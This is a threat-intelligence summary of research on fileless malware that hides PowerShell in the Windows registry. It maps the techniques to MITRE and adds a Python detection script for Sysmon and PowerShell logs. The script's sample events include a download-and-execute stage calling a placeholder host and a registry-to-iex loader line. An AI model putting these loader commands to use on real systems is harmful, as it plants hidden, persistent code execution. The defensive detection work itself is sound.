The Ghost in the Machine: Tracking Stealthy Fileless Malware in the Windows Registry

Threat actors are increasingly using fileless code execution through the Windows registry to evade traditional AV/EDR detections. The article shows real-world examples (STEADY#URSA/SUBTLE#PAWS, GOOTLOADER, COOKBOX, Qakbot) and outlines practical detection approaches leveraging Sysmon and PowerShell logs.
#SUBTLEPAWS #STEADYURSA #GOOTLOADER #COOKBOX #Qakbot #CERT-UA #Ukraine

Keypoints

  • Fileless malware executes in memory or in non-disk locations, leaving minimal artifacts for traditional antivirus.
  • The Windows registry is used as a persistence and execution layer, enabling code to run without writing to disk.
  • STEADY#URSA/SUBTLE#PAWS stores large chunks of base64-encoded PowerShell in registry keys and executes it in memory.
  • GOOTLOADER uses multiple registry keys under HKCU to store payloads and employs in-memory loading (FONELAUNCH) to evade detection.
  • COOKBOX, delivered through XLS documents with malicious VBA, stores obfuscated PowerShell in registry keys; that stored code downloads and executes further PowerShell from C2 sources.
  • Qakbot uses registry injection with long base64 payloads and a scheduled task to execute decoded content.
  • Detection focuses on endpoint telemetry (Sysmon, PowerShell logs) and threat hunting queries around Set-ItemProperty, registry changes, and PowerShell activity.

MITRE Techniques

  • [T1059.001] PowerShell – PowerShell-based backdoor uses base64-encoded code loaded from registry and executed with Get-ItemProperty and Invoke-Expression. ‘base64 encoded PowerShell was decoded and dumped into various registry keys inside of the HKCU\System directory.’
  • [T1112] Modify Registry – Attackers store and execute code by placing PowerShell functions as registry keys; ‘the initial backdoor code stored each PowerShell function as its own unique registry key formatted as null-terminated strings.’
  • [T1547.001] Registry Run Keys/Startup Folder – Registry is used to establish persistence by leveraging Windows Startup/Run keys to execute code. ‘The registry is used to establish persistence by leveraging windows Startup/Run keys to execute code.’
  • [T1548.002] Bypass User Account Control – Techniques include executing code for UAC bypass purposes via registry-based methods. ‘…UAC bypass purposes.’
  • [T1027] Obfuscated/Compressed Files and Information – Code is heavily obfuscated/encoded within registry entries. ‘layers of heavily obfuscated and encoded code.’
  • [T1053.005] Scheduled Task – Attacker creates a scheduled task along with registry keys to run decoded payloads. ‘a scheduled task was created along with three unique registry keys…’
  • [T1105] Ingress Tool Transfer – Payloads are downloaded and executed, sometimes from C2 servers or external sources (e.g., Github). ‘PowerShell scripts that handle the download and execution functionality of PowerShell commandlets from C2 servers.’
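The detection approach listed in the keypoints (hunting Sysmon registry-value-set events and PowerShell script block logs for the Get-ItemProperty / Invoke-Expression loader pattern described under T1059.001) is shown below as an added example; it is not code from the Securonix article. It is written in Python so it runs offline over constructed log records rather than against a live SIEM. The sample events, the placeholder SID, the value name result_code and the Phone\<user> key path (both modeled on the key names quoted on this page), the example.invalid URL, the 200-character blob threshold and the token patterns are all assumptions to be tuned per environment.

```python
import base64
import binascii
import re

# Assumed thresholds/patterns for this example; real registry-resident payloads run to kilobytes.
MIN_BLOB_LEN = 200
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Tokens that mark decoded data as PowerShell rather than a benign binary or config blob.
PS_TOKENS = re.compile(
    r"\$\w+\s*=|function\s+[\w-]+|Invoke-Expression|\biex\b|New-Object|"
    r"FromBase64String|DownloadString",
    re.IGNORECASE,
)
# Script block that reads a registry value and hands it to IEX or a base64 decoder.
LOADER_RE = re.compile(
    r"Get-ItemProperty.*?(Invoke-Expression|\biex\b|FromBase64String)",
    re.IGNORECASE | re.DOTALL,
)


def decode_blob(data):
    """Return decoded text if `data` is a base64 blob that decodes to PowerShell, else None."""
    compact = re.sub(r"\s+", "", data or "")
    if len(compact) < MIN_BLOB_LEN or not B64_RE.match(compact):
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    # -EncodedCommand payloads are UTF-16LE; strings written via Set-ItemProperty are usually UTF-8.
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if PS_TOKENS.search(text):
            return text
    return None


def hunt(events):
    """Flag Sysmon EID 13 value sets holding encoded PowerShell and EID 4104 registry-to-IEX loaders."""
    hits = []
    for ev in events:
        if ev.get("EventID") == 13:
            # Sysmon records per-user hives as HKU\<SID>\..., so HKCU persistence appears under HKU.
            target = ev.get("TargetObject", "")
            decoded = decode_blob(ev.get("Details"))
            if decoded and target.upper().startswith("HKU\\"):
                hits.append((13, target, decoded[:60]))
        elif ev.get("EventID") == 4104:
            block = ev.get("ScriptBlockText", "")
            if LOADER_RE.search(block):
                hits.append((4104, ev.get("ScriptBlockId", ""), block[:60]))
    return hits


# Constructed sample events (not from the article), flattened the way a SIEM presents them.
STAGE_PS = (
    "function Invoke-Stage {\n"
    "  $wc = New-Object System.Net.WebClient\n"
    "  $src = $wc.DownloadString('http://example.invalid/stage2.txt')\n"
    "  Invoke-Expression $src\n"
    "}\n"
    "Invoke-Stage\n"
)
USER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"  # placeholder SID
PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

SAMPLE_EVENTS = [
    {"EventID": 13, "Image": PS_EXE,  # UTF-16LE base64, the -EncodedCommand convention
     "TargetObject": f"HKU\\{USER_SID}\\System\\result_code",
     "Details": base64.b64encode(STAGE_PS.encode("utf-16-le")).decode()},
    {"EventID": 13, "Image": PS_EXE,  # same script stored as UTF-8 base64 under Phone\<user>\0
     "TargetObject": f"HKU\\{USER_SID}\\SOFTWARE\\Microsoft\\Phone\\jdoe\\0",
     "Details": base64.b64encode(STAGE_PS.encode("utf-8")).decode()},
    {"EventID": 13, "Image": "C:\\Program Files\\Vendor\\agent.exe",  # benign long binary blob
     "TargetObject": f"HKU\\{USER_SID}\\SOFTWARE\\Vendor\\Agent\\Cert",
     "Details": base64.b64encode(bytes(range(256))).decode()},
    {"EventID": 4104, "ScriptBlockId": "a1",  # loader: registry value -> base64 decode -> iex
     "ScriptBlockText": "$p = (Get-ItemProperty -Path 'HKCU:\\System' -Name result_code).result_code;"
                        "iex ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)))"},
    {"EventID": 4104, "ScriptBlockId": "b2",  # benign admin query, no execution of the value
     "ScriptBlockText": "Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' "
                        "-Name ProductName"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Two caveats when running this against real telemetry: Sysmon only emits Event ID 13 for registry paths its configuration includes, and for REG_BINARY values the Details field reads "Binary Data" rather than the contents, so a payload written as a binary value will not be caught by the blob check and has to be found via the 4104 loader pattern or by reading the hive directly. Script Block Logging must be enabled for 4104 events to exist at all.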

Indicators of Compromise

  • [Registry Key/Value] Registry-based payload locations – example: HKCU\SOFTWARE\Microsoft\Phone\%USERNAME%\0, HKCU\SOFTWARE\Microsoft\Phone\%USERNAME%
  • [Registry Key/Value] Example value containing PowerShell code – example: result_code under HKU\System, with suspicious PowerShell in the value data
  • [Domain] GitHub – example: github.com as a source for downloaded PowerShell payloads
  • [Document] XLS Office documents containing malicious VBA – example: XLS documents used to deliver PowerShell code

Read more: https://www.securonix.com/blog/the-ghost-in-the-machine-tracking-stealthy-fileless-malware-in-the-windows-registry/